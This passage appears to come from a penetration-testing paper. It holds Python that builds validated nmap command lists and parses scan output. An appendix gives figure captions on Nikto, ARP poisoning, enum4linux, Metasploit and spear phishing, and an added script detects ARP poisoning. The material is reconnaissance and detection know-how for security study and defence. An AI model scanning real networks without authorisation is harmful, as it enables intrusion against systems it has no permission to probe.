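# Targets may be IPv4/IPv6, hostnames or CIDR ranges; anything shell-like is refused.
TARGET_RE = re.compile(r"^[A-Za-z0-9.\-/:]+$")
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s*(.*)$")


def build_command(target: str, options: list[str], ports: str | None = None) -> list[str]:
    """Return an argv list for subprocess.run(..., shell=False). Options that are
    not in Table 1 are rejected so a typo cannot turn into an unintended scan."""
    if not TARGET_RE.match(target):
        raise ValueError(f"refusing suspicious target {target!r}")
    bad = [o for o in options if o not in BASIC_OPTIONS]
    if bad:
        raise ValueError(f"unknown option(s): {bad}")
    argv = ["nmap", *options]
    if ports is not None:
        if not re.fullmatch(r"[0-9,\-]+", ports):
            raise ValueError(f"bad port specification {ports!r}")
        argv += ["-p", ports]
    argv.append(target)
    return argv


def _parse_ports(value: str) -> list[PortRecord]:
    # Each comma-separated entry is port/state/protocol/owner/service/rpc info/version/
    out = []
    for entry in value.split(","):
        fields = entry.strip().split("/")
        if len(fields) < 7:
            continue
        port, state, proto, _owner, service, _rpc, version = fields[:7]
        out.append(PortRecord(int(port), proto, state, service, version))
    return out


def parse_grepable(text: str) -> dict[str, HostRecord]:
    """Merge the separate Status and Ports lines Nmap emits per host into one record."""
    hosts: dict[str, HostRecord] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and blank lines
        ip, hostname, rest = m.groups()
        rec = hosts.setdefault(ip, HostRecord(ip=ip, hostname=hostname))
        for chunk in rest.split("\t"):
            key, _, value = chunk.partition(": ")
            if key == "Status":
                rec.status = value.strip()
            elif key == "Ports":
                rec.ports.extend(_parse_ports(value))
    return hosts


def open_services(hosts: dict[str, HostRecord]) -> list[tuple[str, int, str, str]]:
    """Flat (ip, port, service, version) rows suitable for the test record."""
    return [(h.ip, p.port, p.service, p.version)
            for h in hosts.values() for p in h.ports if p.state == "open"]


if __name__ == "__main__":
    print(build_command("192.168.1.1", ["-sV", "-sC"], ports="80"))
    for row in open_services(parse_grepable(SAMPLE_GREPABLE)):
        print(row)
```

The argv form matters for record-keeping scripts: the target and port list are passed as separate arguments rather than interpolated into a shell string, so a hostname copied from a scoping document cannot change the command that runs. Filtered ports are kept in the host record but excluded from the open-services summary, which is the list a tester carries into the enumeration stage.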


Appendix B

Figure 1. Nikto Options 1

Note: This illustrates the options that Nikto offers when performing a scan


Figure 2. Nikto Options 2

Note: This illustrates the rest of the Nikto options when performing a scan


Figure 3. ARP Poisoning Before and After

Note: This illustrates how network traffic between two devices changes when an ARP poisoning attack has been performed
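The change Figure 3 illustrates leaves two signatures in the ARP traffic that a blue team can watch for: an IP address whose MAC mapping changes, and a single MAC that begins answering for more than one IP (the gateway and the victim). The following Python is an added, defender-side example and not from the paper; the ARP reply records are constructed, and the optional baseline map (a trusted ip-to-mac table, e.g. for the gateway) is an assumption of this example rather than something the figure shows.

```python
"""Added example (not from the paper): flag the traffic changes an ARP
poisoning attack produces. Input is a list of observed ARP replies as
(timestamp, sender_ip, sender_mac); the records below are constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    ts: float
    kind: str    # "mac-change" or "multi-ip"
    detail: str


# Constructed sample: a gateway (.1) and a workstation (.10) answer normally,
# then a third MAC starts answering for both addresses, as in the "after" half
# of Figure 3.
SAMPLE_REPLIES = [
    (1.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (2.0, "192.168.1.10", "aa:bb:cc:00:00:10"),
    (3.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (9.0, "192.168.1.1", "de:ad:be:ef:00:99"),
    (9.5, "192.168.1.10", "de:ad:be:ef:00:99"),
]


def detect_arp_anomalies(replies, baseline=None):
    """Return alerts for (a) an IP whose MAC changes and (b) one MAC claiming
    several IPs. `baseline` is an optional trusted ip -> mac map (assumed here,
    e.g. the gateway) so the first reply seen cannot silently become the
    reference mapping."""
    table = {ip: mac.lower() for ip, mac in (baseline or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in table.items():
        ips_by_mac[mac].add(ip)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = table.get(ip)
        if prev is not None and prev != mac:
            alerts.append(Alert(ts, "mac-change", f"{ip}: {prev} -> {mac}"))
            ips_by_mac[prev].discard(ip)
        table[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                alerts.append(Alert(ts, "multi-ip",
                                    f"{mac} answers for {sorted(ips_by_mac[mac])}"))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_REPLIES):
        print(alert)
```

A mac-change alert on its own is also raised by a legitimate NIC or router replacement, so it is a triage lead rather than proof of an attack; the multi-ip alert, where one MAC answers for the gateway and a host at the same time, is the stronger indicator and is what the "after" state of Figure 3 looks like on the wire.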


Figure 4. Enum4Linux Help Page Output

Note: This illustrates the output of the help page for enum4linux. This shows the options available when performing enumeration with enum4linux.


Figure 5. Syntax for Metasploit

Note: This illustrates the syntax for Metasploit Framework command-line usage


Figure 6. Spear Phishing Model: Targeted Cyber Attack

Note: This figure illustrates the spear phishing attack model used to launch a targeted attack